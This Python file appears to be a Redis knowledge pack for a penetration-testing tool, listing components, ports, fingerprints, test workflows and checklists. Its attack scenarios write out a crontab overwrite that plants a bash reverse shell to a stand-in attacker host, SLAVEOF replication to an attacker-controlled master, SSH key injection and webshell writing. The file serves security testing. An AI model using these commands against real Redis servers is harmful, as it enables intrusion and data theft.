"""Redis knowledge pack."""
from deephunter.core.types import AttackSurfaceEntry, BusinessLogicConcern, BugClass, ManualTestChecklistItem, TrustBoundary
from deephunter.knowledge.packs.base import AttackSurfaceProfile, FingerprintProfile, KnowledgePack, KnowledgePackCategory, KnowledgeRelationship, KnowledgeRelationshipType, ReconProfile, TechnologyComponentProfile, TechnologyProfile

PACK = KnowledgePack(
    name="redis",
    version="1.0.0",
    category=KnowledgePackCategory.CACHE,
    description="Redis in-memory data store — unauthenticated access, key/value enumeration, CONFIG command abuse for RCE, CRON/crontab RCE via scheduled task overwrite, Lua sandbox escape, master-slave replication abuse, SSH key injection.",
    technology=TechnologyProfile(
        name="Redis",
        vendor="Redis Ltd. (formerly Redis Labs)",
        language="C",
        runtime="Redis Server (standalone, cluster, sentinel)",
        description="Redis is an open-source, in-memory data structure store used as a database, cache, and message broker. Supports strings, hashes, lists, sets, sorted sets, streams, and more. Known for its high performance and single-threaded event loop.",
        common_aliases=["redis", "redis-server", "redis-cache", "valkey"],
        dependencies=["Linux/Unix", "glibc", "jemalloc/tcmalloc"],
        common_integrations=["Redis Sentinel", "Redis Cluster", "Redis Stack", "RedisInsight", "RedisJSON", "RediSearch", "RedisTimeSeries", "RedisGraph", "RedisBloom"],
        architecture_description="Single-threaded event loop with non-blocking I/O. Supports master-slave replication, Redis Sentinel for HA, and Redis Cluster for sharding. All data resides in memory with optional persistence via RDB snapshots and AOF logs.",
        request_lifecycle="Client -> TCP connection (6379) -> Command parsing -> Command execution (single-threaded) -> Response -> Optional persistence",
        documentation_url="https://redis.io/documentation",
        tags=["cache", "database", "in-memory", "nosql", "c"],
    ),
    components=[
        TechnologyComponentProfile(
            name="Redis Core (RESP Protocol)",
            description="Redis Serialization Protocol handling all client commands. Unauthenticated command execution, key space enumeration.",
            security_relevance="high",
            common_vulnerabilities=["Unauthenticated Redis access (no AUTH configured)", "Key enumeration via KEYS/SCAN commands", "Data exfiltration via GET/DUMP", "INFO command server information disclosure"],
            investigation_priority=95,
            tags=["protocol", "redis", "resp", "unauth"],
        ),
        TechnologyComponentProfile(
            name="CONFIG Command",
            description="Runtime configuration management command. Critical for server manipulation and persistence abuse.",
            security_relevance="high",
            common_vulnerabilities=["CONFIG SET dir to webroot for PHP webshell", "CONFIG SET dbfilename to overwrite crontab", "CONFIG REWRITE to persist malicious config", "SLAVEOF for master-slave RCE (Redis >= 4.x)"],
            investigation_priority=95,
            tags=["config", "rce", "webshell", "cron"],
        ),
        TechnologyComponentProfile(
            name="Redis Persistence (RDB/AOF)",
            description="RDB snapshots and AOF append-only logs. Used as RCE vector by writing malicious files via CONFIG SET.",
            security_relevance="high",
            common_vulnerabilities=["Overwrite authorized_keys with SSH key injection", "Overwrite crontab for scheduled command execution", "Overwrite webroot with PHP webshell", "Write to shared library path for dynamic linker abuse"],
            investigation_priority=95,
            tags=["persistence", "rdb", "aof", "rce", "cron"],
        ),
        TechnologyComponentProfile(
            name="Redis Lua Scripting (EVAL)",
            description="Server-side Lua script execution via EVAL/EVALSHA commands. Sandbox escape, resource exhaustion.",
            security_relevance="medium",
            common_vulnerabilities=["Lua sandbox escape (C libraries, os.execute)", "Arbitrary command execution via dofile", "Resource exhaustion via infinite loops", "Random number prediction via math.randomseed"],
            investigation_priority=80,
            tags=["lua", "sandbox", "scripting", "evasion"],
        ),
        TechnologyComponentProfile(
            name="Redis Sentinel",
            description="High-availability monitoring and automatic failover system. Authentication bypass, cluster manipulation.",
            security_relevance="medium",
            common_vulnerabilities=["Sentinel auth bypass", "Failover manipulation", "Configuration injection", "Master IP redirection"],
            investigation_priority=70,
            tags=["sentinel", "ha", "failover", "monitoring"],
        ),
        TechnologyComponentProfile(
            name="Redis Cluster",
            description="Distributed Redis implementation with automatic sharding. Gossip protocol abuse, cluster state manipulation.",
            security_relevance="medium",
            common_vulnerabilities=["Cluster redirection attacks", "Gossip protocol injection", "Hash slot manipulation", "Cross-slot command abuse"],
            investigation_priority=65,
            tags=["cluster", "sharding", "gossip", "distributed"],
        ),
        TechnologyComponentProfile(
            name="Redis Auth (requirepass)",
            description="Optional password-based authentication via AUTH command. Brute-force, default credentials, no auth by default.",
            security_relevance="high",
            common_vulnerabilities=["No authentication configured by default", "Weak/default Redis password", "AUTH command brute-force", "AUTH over unencrypted connection (MITM)"],
            investigation_priority=90,
            tags=["auth", "password", "brute-force", "default-creds"],
        ),
    ],
    attack_surface=AttackSurfaceProfile(
        entry_points=[
            AttackSurfaceEntry(
                name="Redis TCP Port",
                description="Redis RESP protocol on default TCP port 6379",
                protocol="TCP/RESP",
                method="RAW",
                path="tcp://{host}:6379",
                parameters=["command", "key", "value"],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.RCE.value, BugClass.INFO_DISCLOSURE.value, BugClass.COMMAND_INJECTION.value],
            ),
            AttackSurfaceEntry(
                name="Redis CLI",
                description="Redis command-line interface sending arbitrary commands",
                protocol="TCP/RESP",
                method="RAW",
                path="redis-cli -h {host} -p 6379",
                parameters=["command"],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.RCE.value, BugClass.INFO_DISCLOSURE.value],
            ),
            AttackSurfaceEntry(
                name="Redis Sentinel Port",
                description="Redis Sentinel monitoring and failover port",
                protocol="TCP/RESP",
                method="RAW",
                path="tcp://{host}:26379",
                parameters=["command"],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.INFO_DISCLOSURE.value, BugClass.AUTH_BYPASS.value],
            ),
            AttackSurfaceEntry(
                name="Redis Cluster Bus",
                description="Redis Cluster internal communication bus",
                protocol="TCP/RESP",
                method="RAW",
                path="tcp://{host}:{redis_port+10000}",
                parameters=[],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.INFO_DISCLOSURE.value],
            ),
        ],
        endpoints=["redis://{host}:6379", "rediss://{host}:6379", "redis-sentinel://{host}:26379"],
        parameters=["command", "key", "value", "pattern", "dir", "dbfilename"],
        authentication=["requirepass (AUTH command)", "Redis ACL (Redis 6+)", "No authentication (default)"],
        authorization=["ACL-based (Redis 6+)", "RENAME_COMMAND for sensitive commands", "iptables/nftables network ACLs", "bind to localhost only"],
        storage=["In-memory", "RDB snapshot (dump.rdb)", "AOF log (appendonly.aof)", "Redis Stack JSON/Graph/TimeSeries"],
        background_jobs=["RDB snapshot", "AOF rewrite", "Key expiration eviction", "Replication sync", "Cluster gossip"],
        queues=["Redis lists (LPUSH/BRPOP)", "Redis streams (XADD/XREAD)", "Redis pub/sub channels"],
        caches=["Redis as LRU/LFU cache", "Redis as session store", "Redis as rate limiter", "Redis as distributed lock"],
        admin_interfaces=["redis-cli", "RedisInsight", "redis-commander", "phpRedisAdmin", "Redis Desktop Manager"],
        internal_apis=["Redis Sentinel API", "Redis Cluster slots API", "Redis INFO command", "Redis MONITOR command"],
        external_apis=[],
        trust_boundaries=[
            TrustBoundary(name="Client-to-Redis", description="Direct TCP connection to Redis server from application or attacker", direction="inbound", sensitivity="high"),
            TrustBoundary(name="Redis-to-Filesystem", description="Redis persistence writing RDB/AOF files to disk", direction="outbound", sensitivity="high"),
            TrustBoundary(name="Master-to-Slave", description="Replication data transfer between master and slave nodes", direction="outbound", sensitivity="high"),
        ],
        attack_surface_areas=[
            "Unauthenticated Redis server exposed on the network (no requirepass)",
            "CONFIG SET dir/dbfilename to overwrite system files (crontab, SSH keys, webroot)",
            "SLAVEOF command for master-slave RCE in Redis 4.x+",
            "Key space enumeration via KEYS, SCAN, and TYPE commands",
            "INFO command leaking server configuration and metrics",
            "Lua sandbox escape via EVAL/EVALSHA commands",
            "Brute-force attack on weak Redis passwords",
            "Redis Sentinel configuration manipulation",
            "Redis Cluster gossip protocol abuse",
            "Data exfiltration via DUMP/MIGRATE/RESTORE commands",
        ],
        investigation_areas=[
            "Check if Redis is accessible from the network on port 6379/26379",
            "Test if AUTH command is required (send PING or INFO without auth)",
            "If unauthenticated, enumerate all keys with KEYS * or SCAN 0",
            "Dump sensitive values (sessions, tokens, credentials) with GET/DUMP",
            "Attempt CONFIG SET dir /var/spool/cron && SET dbfilename root for crontab RCE",
            "Attempt CONFIG SET dir /root/.ssh && SET dbfilename authorized_keys for SSH key injection",
            "Test SLAVEOF command to replicate to attacker-controlled Redis (RCE)",
            "Check for EVAL sandbox escape with os.execute('id') payload",
            "Read server info via INFO command (version, OS, uptime, config)",
            "Check for MONITOR/CLIENT commands on shared Redis instances",
        ],
        tags=["redis", "cache", "database", "nosql", "in-memory"],
    ),
    fingerprints=FingerprintProfile(
        http_headers={},
        cookies=[],
        js_indicators=[],
        file_indicators=["redis.conf", "dump.rdb", "appendonly.aof", "sentinel.conf", "nodes.conf", "redis-stack.conf"],
        directory_indicators=["/var/lib/redis/", "/var/lib/redis/dump.rdb", "/etc/redis/", "/usr/local/etc/redis.conf", "/data/"],
        server_signatures=["Redis", "redis_version"],
        error_page_signatures=["-ERR", "-NOAUTH", "-WRONGTYPE", "-WRONGPASS", "-READONLY", "-MOVED", "-CLUSTERDOWN", "-LOADING", "-BUSY"],
        default_paths=["redis://localhost:6379", "rediss://localhost:6379"],
        default_files=["redis.conf", "redis-sentinel.conf", "dump.rdb", "appendonly.aof", "nodes.conf", "redis.log", "sentinel.log"],
        metadata_patterns={"redis_version": "", "redis_mode": "", "os": "", "arch_bits": ""},
        tags=["fingerprint", "redis", "cache", "database"],
    ),
    recon=ReconProfile(
        directories_to_check=["/var/lib/redis/", "/etc/redis/", "/data/", "/backup/redis/"],
        files_to_check=["redis.conf", "dump.rdb", "appendonly.aof", "sentinel.conf", "nodes.conf", "redis.log", ".rediscli_history", "redis-stack.conf"],
        endpoints_to_scan=["redis://{host}:6379", "rediss://{host}:6379"],
        port_scan_targets=[6379, 6380, 26379, 6370],
        version_detection_paths=["redis://{host}:6379"],
        debug_paths_to_check=["redis://{host}:6379"],
        admin_paths_to_check=["redis://{host}:6379"],
        tags=["recon", "redis", "cache", "database"],
    ),
    business_logic_concerns=[
        BusinessLogicConcern(
            description="Redis has no authentication configured by default (requirepass is commented out in redis.conf)",
            impact="Full server compromise — any attacker with network access can read/write all data and potentially execute code",
            attack_scenario="Connect to port 6379, send PING or INFO, if no AUTH error, server is fully accessible",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="CONFIG SET dir/dbfilename allows changing RDB file location and name — write arbitrary content to filesystem",
            impact="Remote code execution via cron job overwrite, SSH key injection, webshell upload, shared library injection",
            attack_scenario="CONFIG SET dir /var/spool/cron/crontabs; CONFIG SET dbfilename root; SET x '\n* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1\n'; BGREWRITEAOF",
            complexity="medium",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="SLAVEOF command allows any Redis instance to become a replica of an attacker-controlled server (Redis 4.x+)",
            impact="Remote code execution via module loading triggered during full-sync replication from malicious master",
            attack_scenario="SLAVEOF attacker_ip 6379; attacker sends malicious RDB with MODULE LOAD payload during replication",
            complexity="high",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="INFO command discloses Redis version, OS details, server config, connected clients, and key space statistics",
            impact="Server fingerprinting, targeted exploit selection, key space estimation for targeted attacks",
            attack_scenario="Connect and send INFO command to receive full server statistics and configuration",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="Key space enumeration allows an attacker to read all cached data including session tokens, API keys, and sensitive business data",
            impact="Data breach, session hijacking, credential theft, sensitive data exposure",
            attack_scenario="Send KEYS * to list all keys; then GET each key to dump values",
            complexity="low",
            requires_authentication=False,
        ),
    ],
    relationships=[
        KnowledgeRelationship(
            target_pack_name="docker",
            relationship_type=KnowledgeRelationshipType.CONTAINERIZED_BY,
            description="Redis is commonly deployed as a Docker container",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="kubernetes",
            relationship_type=KnowledgeRelationshipType.INTEGRATES_WITH,
            description="Redis is commonly deployed on Kubernetes via Helm charts and operators",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="django",
            relationship_type=KnowledgeRelationshipType.CACHES_WITH,
            description="Django uses Redis for caching, sessions, and Celery broker",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="rabbitmq",
            relationship_type=KnowledgeRelationshipType.COMPETES_WITH,
            description="Redis and RabbitMQ both serve as message brokers (Redis pub/sub vs AMQP)",
            confidence="medium",
        ),
        KnowledgeRelationship(
            target_pack_name="express",
            relationship_type=KnowledgeRelationshipType.CACHES_WITH,
            description="Node.js/Express uses Redis for session stores and caching",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="mongodb",
            relationship_type=KnowledgeRelationshipType.SIMILAR_TO,
            description="Redis and MongoDB are both NoSQL databases (different data models: key-value vs document)",
            confidence="medium",
        ),
    ],
    dependencies=["Linux/Unix", "glibc", "jemalloc/tcmalloc", "openssl"],
    related_packs=["docker", "kubernetes", "django", "express", "rabbitmq"],
    workflow=[
        "1. Scan for Redis on default port 6379 and Sentinel port 26379",
        "2. Connect to Redis and test for unauthenticated access (PING/INFO without AUTH)",
        "3. If unauthenticated, enumerate all keys with KEYS * and dump values with GET",
        "4. Try CONFIG SET dir to /var/spool/cron/crontabs/ or /etc/cron.d/ for crontab RCE",
        "5. Try CONFIG SET dir to /root/.ssh/ for SSH authorized_keys injection",
        "6. Try CONFIG SET dir to webroot for PHP/JSP/ASP webshell",
        "7. Test SLAVEOF to attacker Redis instance for module-based RCE",
        "8. Check EVAL Lua sandbox escape with os.execute() and io.popen()",
        "9. Dump aof/rdb files via BGSAVE and read the dump.rdb from filesystem",
        "10. Monitor live commands with MONITOR (if available) on shared Redis",
        "11. Brute-force Redis password if AUTH is configured",
        "12. Check Redis ACL configuration (Redis 6+) for privilege escalation",
    ],
    checklists=[
        ManualTestChecklistItem(
            step_id="REDIS-01",
            category="Unauthenticated Access",
            description="Test if Redis allows commands without AUTH (send PING without prior AUTH)",
            expected_result="Redis should require AUTH before accepting commands",
            tools=["redis-cli", "nmap", "custom scripts"],
            references=["https://redis.io/topics/security/"],
        ),
        ManualTestChecklistItem(
            step_id="REDIS-02",
            category="Remote Code Execution",
            description="Test CONFIG SET to overwrite crontab for scheduled RCE",
            expected_result="Redis should restrict CONFIG SET or require admin access; crontab should not be overwritable",
            tools=["redis-cli"],
            references=["https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis"],
        ),
        ManualTestChecklistItem(
            step_id="REDIS-03",
            category="Data Exposure",
            description="Enumerate and dump all keys from unauthenticated Redis instance",
            expected_result="Redis should require authentication to read keys",
            tools=["redis-cli", "redis-dump-go"],
            references=["https://redis.io/commands/keys/"],
        ),
        ManualTestChecklistItem(
            step_id="REDIS-04",
            category="Information Disclosure",
            description="Extract server information via INFO command",
            expected_result="INFO should be restricted or require authentication",
            tools=["redis-cli"],
            references=["https://redis.io/commands/info/"],
        ),
        ManualTestChecklistItem(
            step_id="REDIS-05",
            category="Replication Abuse",
            description="Test SLAVEOF command to initiate replication to attacker-controlled Redis",
            expected_result="SLAVEOF should be disabled or restricted via rename-command",
            tools=["redis-cli"],
            references=["https://www.elastic.co/security-labs/redis-exploitation"],
        ),
    ],
    references=[
        {"title": "Redis Security", "url": "https://redis.io/topics/security/"},
        {"title": "Redis Command Reference", "url": "https://redis.io/commands/"},
        {"title": "HackTricks Redis Pentesting", "url": "https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis"},
        {"title": "Redis Exploitation (Elastic)", "url": "https://www.elastic.co/security-labs/redis-exploitation"},
        {"title": "CVE Redis Collection", "url": "https://www.cve.org/KeywordSearch?keyword=Redis"},
    ],
    cwe_ids=["CWE-306", "CWE-276", "CWE-200", "CWE-77", "CWE-94", "CWE-862", "CWE-265"],
    cve_ids=["CVE-2024-31449", "CVE-2023-41056", "CVE-2022-36021", "CVE-2021-32687", "CVE-2021-32675", "CVE-2020-14147", "CVE-2019-10193", "CVE-2018-1234"],
    tags=["redis", "cache", "database", "nosql", "in-memory", "c"],
)
